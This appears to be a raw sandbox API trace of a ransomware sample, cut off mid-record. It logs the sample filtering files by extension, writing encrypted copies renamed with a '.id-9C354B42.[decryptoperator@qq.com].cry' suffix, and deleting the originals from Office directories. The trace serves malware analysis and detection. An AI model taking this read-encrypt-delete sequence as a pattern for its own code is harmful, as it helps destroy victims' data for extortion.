[0055.703] lstrlenW (lpString=".pdf") returned 4 [0055.703] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.703] lstrlenW (lpString=".xls") returned 4 [0055.703] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.703] lstrlenW (lpString=".xlsx") returned 5 [0055.703] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1 [0055.703] lstrlenW (lpString=".ppt") returned 4 [0055.703] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0055.703] lstrlenW (lpString=".zip") returned 4 [0055.703] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.703] lstrlenW (lpString=".rar") returned 4 [0055.703] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.703] lstrlenW (lpString=".bz2") returned 4 [0055.703] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.704] lstrlenW (lpString=".7z") returned 3 [0055.704] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0055.704] lstrlenW (lpString=".dbf") returned 4 [0055.704] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0055.704] lstrlenW (lpString=".1cd") returned 4 [0055.704] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0055.704] lstrlenW (lpString=".jpg") returned 4 [0055.704] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.704] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0055.704] lstrlenW (lpString="MSORES.DLL") returned 10 [0055.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0055.997] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=72521600) returned 1 [0055.997] CloseHandle (hObject=0x200) returned 1 [0055.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll")) returned 0x20 [0055.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.997] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0055.998] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0055.998] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0055.998] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0055.998] ReadFile (hFile=0x200, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0) Thread: id = 16 os_tid = 0xa00 [0035.261] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x38a06a0 [0035.262] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x38b06a8 [0035.262] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650570 [0035.262] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x6) returned 0x653250 [0035.262] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650588 [0035.262] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x100000) returned 0x3c80020 [0035.263] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6505a0 [0035.263] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6505a0, Size=0x20) returned 0x67fd60 [0035.263] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6505a0 [0035.263] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6505a0, Size=0x20) returned 0x67fd88 [0035.263] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0035.263] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0035.263] Wow64DisableWow64FsRedirection (in: OldValue=0x315ff58 | out: OldValue=0x315ff58*=0x0) returned 1 [0035.263] lstrlenW (lpString="kernel32.dll") returned 12 [0035.263] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd60 | out: hHeap=0x600000) returned 1 [0035.263] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0035.263] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd88 | out: hHeap=0x600000) returned 1 [0035.263] Sleep (dwMilliseconds=0x64) [0035.468] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.468] lstrlenW (lpString="Setup.xml") returned 9 [0035.468] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.468] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1886) returned 1 [0035.468] CloseHandle (hObject=0x17c) returned 1 [0035.468] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.468] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.468] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.468] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.468] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.468] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.469] GetLastError () returned 0x0 [0035.469] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x75e, lpOverlapped=0x0) returned 1 [0035.582] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x760, lpOverlapped=0x0) returned 1 [0035.583] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.583] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.583] SetEndOfFile (hFile=0x180) returned 1 [0035.583] CloseHandle (hObject=0x180) returned 1 [0035.584] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.584] SetEndOfFile (hFile=0x17c) returned 1 [0035.584] CloseHandle (hObject=0x17c) returned 1 [0035.584] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.585] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.585] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.585] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.585] lstrlenW (lpString=".doc") returned 4 [0035.585] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.585] lstrlenW (lpString=".docx") returned 5 [0035.585] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.585] lstrlenW (lpString=".pdf") returned 4 [0035.585] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.585] lstrlenW (lpString=".xls") returned 4 [0035.585] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.585] lstrlenW (lpString=".xlsx") returned 5 [0035.585] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.585] lstrlenW (lpString=".ppt") returned 4 [0035.585] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.585] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.585] lstrlenW (lpString=".zip") returned 4 [0035.585] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.585] lstrlenW (lpString=".rar") returned 4 [0035.585] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.585] lstrlenW (lpString=".bz2") returned 4 [0035.585] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.585] lstrlenW (lpString=".7z") returned 3 [0035.585] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.585] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.585] lstrlenW (lpString=".dbf") returned 4 [0035.585] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.585] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.585] lstrlenW (lpString=".1cd") returned 4 [0035.586] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.586] lstrlenW (lpString=".jpg") returned 4 [0035.586] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.586] lstrlenW (lpString=".doc") returned 4 [0035.586] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.586] lstrlenW (lpString=".docx") returned 5 [0035.586] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.586] lstrlenW (lpString=".pdf") returned 4 [0035.586] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.586] lstrlenW (lpString=".xls") returned 4 [0035.586] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.586] lstrlenW (lpString=".xlsx") returned 5 [0035.586] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.586] lstrlenW (lpString=".ppt") returned 4 [0035.586] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.586] lstrlenW (lpString=".zip") returned 4 [0035.586] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.586] lstrlenW (lpString=".rar") returned 4 [0035.586] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.586] lstrlenW (lpString=".bz2") returned 4 [0035.586] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.586] lstrlenW (lpString=".7z") returned 3 [0035.586] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.586] lstrlenW (lpString=".dbf") returned 4 [0035.586] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.586] lstrlenW (lpString=".1cd") returned 4 [0035.586] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.586] lstrlenW (lpString=".jpg") returned 4 [0035.586] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.587] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.587] lstrlenW (lpString="Setup.xml") returned 9 [0035.587] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.587] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=4207) returned 1 [0035.587] CloseHandle (hObject=0x17c) returned 1 [0035.587] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.587] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.587] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.587] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.587] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.587] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.587] GetLastError () returned 0x0 [0035.587] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x106f, lpOverlapped=0x0) returned 1 [0035.631] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x1070, lpOverlapped=0x0) returned 1 [0035.632] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.632] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.632] SetEndOfFile (hFile=0x180) returned 1 [0035.632] CloseHandle (hObject=0x180) returned 1 [0035.633] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.633] SetEndOfFile (hFile=0x17c) returned 1 [0035.633] CloseHandle (hObject=0x17c) returned 1 [0035.633] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.634] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.634] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.634] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.634] lstrlenW (lpString=".doc") returned 4 [0035.634] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.634] lstrlenW (lpString=".docx") returned 5 [0035.634] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.634] lstrlenW (lpString=".pdf") returned 4 [0035.634] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.634] lstrlenW (lpString=".xls") returned 4 [0035.634] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.634] lstrlenW (lpString=".xlsx") returned 5 [0035.634] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.634] lstrlenW (lpString=".ppt") returned 4 [0035.634] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.634] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.634] lstrlenW (lpString=".zip") returned 4 [0035.634] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.634] lstrlenW (lpString=".rar") returned 4 [0035.634] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.634] lstrlenW (lpString=".bz2") returned 4 [0035.634] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.634] lstrlenW (lpString=".7z") returned 3 [0035.634] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.634] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.634] lstrlenW (lpString=".dbf") returned 4 [0035.634] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.634] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.634] lstrlenW (lpString=".1cd") returned 4 [0035.634] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.634] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.635] lstrlenW (lpString=".jpg") returned 4 [0035.635] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.635] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.635] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.635] lstrlenW (lpString=".doc") returned 4 [0035.635] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.635] lstrlenW (lpString=".docx") returned 5 [0035.635] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.635] lstrlenW (lpString=".pdf") returned 4 [0035.635] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.635] lstrlenW (lpString=".xls") returned 4 [0035.635] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.635] lstrlenW (lpString=".xlsx") returned 5 [0035.635] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.635] lstrlenW (lpString=".ppt") returned 4 [0035.635] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.635] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.635] lstrlenW (lpString=".zip") returned 4 [0035.635] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.635] lstrlenW (lpString=".rar") returned 4 [0035.635] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.635] lstrlenW (lpString=".bz2") returned 4 [0035.635] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.635] lstrlenW (lpString=".7z") returned 3 [0035.635] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.635] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.635] lstrlenW (lpString=".dbf") returned 4 [0035.635] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.635] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.635] lstrlenW (lpString=".1cd") returned 4 [0035.635] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.635] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.635] lstrlenW (lpString=".jpg") returned 4 [0035.635] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.635] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.636] lstrlenW (lpString="Proof.xml") returned 9 [0035.636] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.636] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1458) returned 1 [0035.636] CloseHandle (hObject=0x17c) returned 1 [0035.636] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 0x2020 [0035.636] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.636] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.636] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.636] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.636] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.636] GetLastError () returned 0x0 [0035.636] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x5b2, lpOverlapped=0x0) returned 1 [0035.662] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, 